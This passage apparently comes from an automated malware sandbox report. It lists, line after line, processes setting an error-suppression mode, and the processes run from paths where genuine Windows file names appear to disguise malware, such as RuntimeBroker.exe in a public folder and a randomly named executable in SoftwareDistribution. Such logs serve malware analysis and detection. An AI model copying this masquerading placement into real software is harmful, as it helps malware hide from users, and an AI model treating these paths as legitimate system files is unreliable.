                            Source: C:\Program Files\Windows NT\TableTextService\en-US\fontdrvhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Program Files\Windows NT\TableTextService\en-US\fontdrvhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Program Files\Windows NT\TableTextService\en-US\fontdrvhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Program Files\Windows NT\TableTextService\en-US\fontdrvhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Program Files\Windows NT\TableTextService\en-US\fontdrvhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Program Files\Windows NT\TableTextService\en-US\fontdrvhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Program Files\Windows NT\TableTextService\en-US\fontdrvhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Program Files\Windows NT\TableTextService\en-US\fontdrvhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Program Files\Windows NT\TableTextService\en-US\fontdrvhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Program Files\Windows NT\TableTextService\en-US\fontdrvhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Program Files\Windows NT\TableTextService\en-US\fontdrvhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Program Files\Windows NT\TableTextService\en-US\fontdrvhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Program Files\Windows NT\TableTextService\en-US\fontdrvhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Program Files\Windows NT\TableTextService\en-US\fontdrvhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Program Files\Windows NT\TableTextService\en-US\fontdrvhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Program Files\Windows NT\TableTextService\en-US\fontdrvhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Program Files\Windows NT\TableTextService\en-US\fontdrvhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Program Files\Windows NT\TableTextService\en-US\fontdrvhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Program Files\Windows NT\TableTextService\en-US\fontdrvhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Program Files\Windows NT\TableTextService\en-US\fontdrvhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Program Files\Windows NT\TableTextService\en-US\fontdrvhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Program Files\Windows NT\TableTextService\en-US\fontdrvhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Program Files\Windows NT\TableTextService\en-US\fontdrvhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Program Files\Windows NT\TableTextService\en-US\fontdrvhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Program Files\Windows NT\TableTextService\en-US\fontdrvhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Program Files\Windows NT\TableTextService\en-US\fontdrvhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Program Files\Windows NT\TableTextService\en-US\fontdrvhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Program Files\Windows NT\TableTextService\en-US\fontdrvhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Program Files\Windows NT\TableTextService\en-US\fontdrvhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Program Files\Windows NT\TableTextService\en-US\fontdrvhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Program Files\Windows NT\TableTextService\en-US\fontdrvhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Program Files\Windows NT\TableTextService\en-US\fontdrvhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Program Files\Windows NT\TableTextService\en-US\fontdrvhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Program Files\Windows NT\TableTextService\en-US\fontdrvhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Program Files\Windows NT\TableTextService\en-US\fontdrvhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Program Files\Windows NT\TableTextService\en-US\fontdrvhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Program Files\Windows NT\TableTextService\en-US\fontdrvhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Program Files\Windows NT\TableTextService\en-US\fontdrvhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Program Files\Windows NT\TableTextService\en-US\fontdrvhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Program Files\Windows NT\TableTextService\en-US\fontdrvhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Program Files\Windows NT\TableTextService\en-US\fontdrvhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Program Files\Windows NT\TableTextService\en-US\fontdrvhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Program Files\Windows NT\TableTextService\en-US\fontdrvhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Program Files\Windows NT\TableTextService\en-US\fontdrvhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Program Files\Windows NT\TableTextService\en-US\fontdrvhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Program Files\Windows NT\TableTextService\en-US\fontdrvhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Program Files\Windows NT\TableTextService\en-US\fontdrvhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Program Files\Windows NT\TableTextService\en-US\fontdrvhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Program Files\Windows NT\TableTextService\en-US\fontdrvhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Program Files\Windows NT\TableTextService\en-US\fontdrvhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Program Files\Windows NT\TableTextService\en-US\fontdrvhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Program Files\Windows NT\TableTextService\en-US\fontdrvhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Program Files\Windows NT\TableTextService\en-US\fontdrvhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Program Files\Windows NT\TableTextService\en-US\fontdrvhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Program Files\Windows NT\TableTextService\en-US\fontdrvhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Program Files\Windows NT\TableTextService\en-US\fontdrvhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Program Files\Windows NT\TableTextService\en-US\fontdrvhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Program Files\Windows NT\TableTextService\en-US\fontdrvhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Program Files\Windows NT\TableTextService\en-US\fontdrvhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Program Files\Windows NT\TableTextService\en-US\fontdrvhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Program Files\Windows NT\TableTextService\en-US\fontdrvhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\SoftwareDistribution\jnTUlYyDyuybgXdgxhTkT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\SoftwareDistribution\jnTUlYyDyuybgXdgxhTkT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\SoftwareDistribution\jnTUlYyDyuybgXdgxhTkT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\SoftwareDistribution\jnTUlYyDyuybgXdgxhTkT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\SoftwareDistribution\jnTUlYyDyuybgXdgxhTkT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\SoftwareDistribution\jnTUlYyDyuybgXdgxhTkT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\SoftwareDistribution\jnTUlYyDyuybgXdgxhTkT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\SoftwareDistribution\jnTUlYyDyuybgXdgxhTkT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\SoftwareDistribution\jnTUlYyDyuybgXdgxhTkT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\SoftwareDistribution\jnTUlYyDyuybgXdgxhTkT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\SoftwareDistribution\jnTUlYyDyuybgXdgxhTkT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\SoftwareDistribution\jnTUlYyDyuybgXdgxhTkT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\SoftwareDistribution\jnTUlYyDyuybgXdgxhTkT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\SoftwareDistribution\jnTUlYyDyuybgXdgxhTkT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\SoftwareDistribution\jnTUlYyDyuybgXdgxhTkT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\SoftwareDistribution\jnTUlYyDyuybgXdgxhTkT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\SoftwareDistribution\jnTUlYyDyuybgXdgxhTkT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\SoftwareDistribution\jnTUlYyDyuybgXdgxhTkT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\SoftwareDistribution\jnTUlYyDyuybgXdgxhTkT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\SoftwareDistribution\jnTUlYyDyuybgXdgxhTkT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\SoftwareDistribution\jnTUlYyDyuybgXdgxhTkT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\SoftwareDistribution\jnTUlYyDyuybgXdgxhTkT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\SoftwareDistribution\jnTUlYyDyuybgXdgxhTkT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\SoftwareDistribution\jnTUlYyDyuybgXdgxhTkT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\SoftwareDistribution\jnTUlYyDyuybgXdgxhTkT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\SoftwareDistribution\jnTUlYyDyuybgXdgxhTkT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\SoftwareDistribution\jnTUlYyDyuybgXdgxhTkT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\SoftwareDistribution\jnTUlYyDyuybgXdgxhTkT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\SoftwareDistribution\jnTUlYyDyuybgXdgxhTkT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\SoftwareDistribution\jnTUlYyDyuybgXdgxhTkT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\SoftwareDistribution\jnTUlYyDyuybgXdgxhTkT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\SoftwareDistribution\jnTUlYyDyuybgXdgxhTkT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\SoftwareDistribution\jnTUlYyDyuybgXdgxhTkT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\SoftwareDistribution\jnTUlYyDyuybgXdgxhTkT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\SoftwareDistribution\jnTUlYyDyuybgXdgxhTkT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\SoftwareDistribution\jnTUlYyDyuybgXdgxhTkT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\SoftwareDistribution\jnTUlYyDyuybgXdgxhTkT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\SoftwareDistribution\jnTUlYyDyuybgXdgxhTkT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\SoftwareDistribution\jnTUlYyDyuybgXdgxhTkT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\SoftwareDistribution\jnTUlYyDyuybgXdgxhTkT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\SoftwareDistribution\jnTUlYyDyuybgXdgxhTkT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\SoftwareDistribution\jnTUlYyDyuybgXdgxhTkT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\SoftwareDistribution\jnTUlYyDyuybgXdgxhTkT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\SoftwareDistribution\jnTUlYyDyuybgXdgxhTkT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\SoftwareDistribution\jnTUlYyDyuybgXdgxhTkT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\SoftwareDistribution\jnTUlYyDyuybgXdgxhTkT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\SoftwareDistribution\jnTUlYyDyuybgXdgxhTkT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\SoftwareDistribution\jnTUlYyDyuybgXdgxhTkT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\SoftwareDistribution\jnTUlYyDyuybgXdgxhTkT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\SoftwareDistribution\jnTUlYyDyuybgXdgxhTkT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\SoftwareDistribution\jnTUlYyDyuybgXdgxhTkT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\SoftwareDistribution\jnTUlYyDyuybgXdgxhTkT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\SoftwareDistribution\jnTUlYyDyuybgXdgxhTkT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\SoftwareDistribution\jnTUlYyDyuybgXdgxhTkT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\SoftwareDistribution\jnTUlYyDyuybgXdgxhTkT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\SoftwareDistribution\jnTUlYyDyuybgXdgxhTkT.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\SoftwareDistribution\jnTUlYyDyuybgXdgxhTkT.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\SoftwareDistribution\jnTUlYyDyuybgXdgxhTkT.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\SoftwareDistribution\jnTUlYyDyuybgXdgxhTkT.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\SoftwareDistribution\jnTUlYyDyuybgXdgxhTkT.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\SoftwareDistribution\jnTUlYyDyuybgXdgxhTkT.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\SoftwareDistribution\jnTUlYyDyuybgXdgxhTkT.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\SoftwareDistribution\jnTUlYyDyuybgXdgxhTkT.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\SoftwareDistribution\jnTUlYyDyuybgXdgxhTkT.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\SoftwareDistribution\jnTUlYyDyuybgXdgxhTkT.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\SoftwareDistribution\jnTUlYyDyuybgXdgxhTkT.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\SoftwareDistribution\jnTUlYyDyuybgXdgxhTkT.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\SoftwareDistribution\jnTUlYyDyuybgXdgxhTkT.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\SoftwareDistribution\jnTUlYyDyuybgXdgxhTkT.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\SoftwareDistribution\jnTUlYyDyuybgXdgxhTkT.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\SoftwareDistribution\jnTUlYyDyuybgXdgxhTkT.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\SoftwareDistribution\jnTUlYyDyuybgXdgxhTkT.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\SoftwareDistribution\jnTUlYyDyuybgXdgxhTkT.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\SoftwareDistribution\jnTUlYyDyuybgXdgxhTkT.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\SoftwareDistribution\jnTUlYyDyuybgXdgxhTkT.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\SoftwareDistribution\jnTUlYyDyuybgXdgxhTkT.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\SoftwareDistribution\jnTUlYyDyuybgXdgxhTkT.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\SoftwareDistribution\jnTUlYyDyuybgXdgxhTkT.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\SoftwareDistribution\jnTUlYyDyuybgXdgxhTkT.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\SoftwareDistribution\jnTUlYyDyuybgXdgxhTkT.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\SoftwareDistribution\jnTUlYyDyuybgXdgxhTkT.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\SoftwareDistribution\jnTUlYyDyuybgXdgxhTkT.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\SoftwareDistribution\jnTUlYyDyuybgXdgxhTkT.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\SoftwareDistribution\jnTUlYyDyuybgXdgxhTkT.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\SoftwareDistribution\jnTUlYyDyuybgXdgxhTkT.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\SoftwareDistribution\jnTUlYyDyuybgXdgxhTkT.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\SoftwareDistribution\jnTUlYyDyuybgXdgxhTkT.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\SoftwareDistribution\jnTUlYyDyuybgXdgxhTkT.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\Public\Libraries\RuntimeBroker.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\Public\Libraries\RuntimeBroker.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\Public\Libraries\RuntimeBroker.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\Public\Libraries\RuntimeBroker.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\Public\Libraries\RuntimeBroker.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\Public\Libraries\RuntimeBroker.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\Public\Libraries\RuntimeBroker.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\Public\Libraries\RuntimeBroker.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\Public\Libraries\RuntimeBroker.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\Public\Libraries\RuntimeBroker.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\Public\Libraries\RuntimeBroker.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\Public\Libraries\RuntimeBroker.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\Public\Libraries\RuntimeBroker.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\Public\Libraries\RuntimeBroker.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\Public\Libraries\RuntimeBroker.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\Public\Libraries\RuntimeBroker.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\Public\Libraries\RuntimeBroker.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\Public\Libraries\RuntimeBroker.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\Public\Libraries\RuntimeBroker.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\Public\Libraries\RuntimeBroker.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\Public\Libraries\RuntimeBroker.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\Public\Libraries\RuntimeBroker.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\Public\Libraries\RuntimeBroker.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\Public\Libraries\RuntimeBroker.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\Public\Libraries\RuntimeBroker.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\Public\Libraries\RuntimeBroker.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\Public\Libraries\RuntimeBroker.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\Public\Libraries\RuntimeBroker.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\Public\Libraries\RuntimeBroker.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\Public\Libraries\RuntimeBroker.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\Public\Libraries\RuntimeBroker.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\Public\Libraries\RuntimeBroker.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\Public\Libraries\RuntimeBroker.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\Public\Libraries\RuntimeBroker.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\Public\Libraries\RuntimeBroker.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\Public\Libraries\RuntimeBroker.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\Public\Libraries\RuntimeBroker.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\Public\Libraries\RuntimeBroker.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\Public\Libraries\RuntimeBroker.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\Public\Libraries\RuntimeBroker.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\Public\Libraries\RuntimeBroker.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\Public\Libraries\RuntimeBroker.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\Public\Libraries\RuntimeBroker.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\Public\Libraries\RuntimeBroker.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\Public\Libraries\RuntimeBroker.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\Public\Libraries\RuntimeBroker.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\Public\Libraries\RuntimeBroker.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\Public\Libraries\RuntimeBroker.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\Public\Libraries\RuntimeBroker.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\Public\Libraries\RuntimeBroker.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\Public\Libraries\RuntimeBroker.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\Public\Libraries\RuntimeBroker.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\Public\Libraries\RuntimeBroker.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\Public\Libraries\RuntimeBroker.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\Public\Libraries\RuntimeBroker.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\Public\Libraries\RuntimeBroker.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\Public\Libraries\RuntimeBroker.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\Public\Libraries\RuntimeBroker.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\Public\Libraries\RuntimeBroker.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\Public\Libraries\RuntimeBroker.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\Public\Libraries\RuntimeBroker.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\Public\Libraries\RuntimeBroker.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\Public\Libraries\RuntimeBroker.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\Public\Libraries\RuntimeBroker.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\Public\Libraries\RuntimeBroker.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\Public\Libraries\RuntimeBroker.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Program Files (x86)\Windows NT\Accessories\en-GB\upfc.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Program Files (x86)\Windows NT\Accessories\en-GB\upfc.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Program Files (x86)\Windows NT\Accessories\en-GB\upfc.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Program Files (x86)\Windows NT\Accessories\en-GB\upfc.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Program Files (x86)\Windows NT\Accessories\en-GB\upfc.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Program Files (x86)\Windows NT\Accessories\en-GB\upfc.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Program Files (x86)\Windows NT\Accessories\en-GB\upfc.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Program Files (x86)\Windows NT\Accessories\en-GB\upfc.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Program Files (x86)\Windows NT\Accessories\en-GB\upfc.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Program Files (x86)\Windows NT\Accessories\en-GB\upfc.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Program Files (x86)\Windows NT\Accessories\en-GB\upfc.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Program Files (x86)\Windows NT\Accessories\en-GB\upfc.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Program Files (x86)\Windows NT\Accessories\en-GB\upfc.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Program Files (x86)\Windows NT\Accessories\en-GB\upfc.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Program Files (x86)\Windows NT\Accessories\en-GB\upfc.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Program Files (x86)\Windows NT\Accessories\en-GB\upfc.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Program Files (x86)\Windows NT\Accessories\en-GB\upfc.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Program Files (x86)\Windows NT\Accessories\en-GB\upfc.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Program Files (x86)\Windows NT\Accessories\en-GB\upfc.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Program Files (x86)\Windows NT\Accessories\en-GB\upfc.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Program Files (x86)\Windows NT\Accessories\en-GB\upfc.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Program Files (x86)\Windows NT\Accessories\en-GB\upfc.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Program Files (x86)\Windows NT\Accessories\en-GB\upfc.exeProcess information set: NOOPENFILEERRORBOX
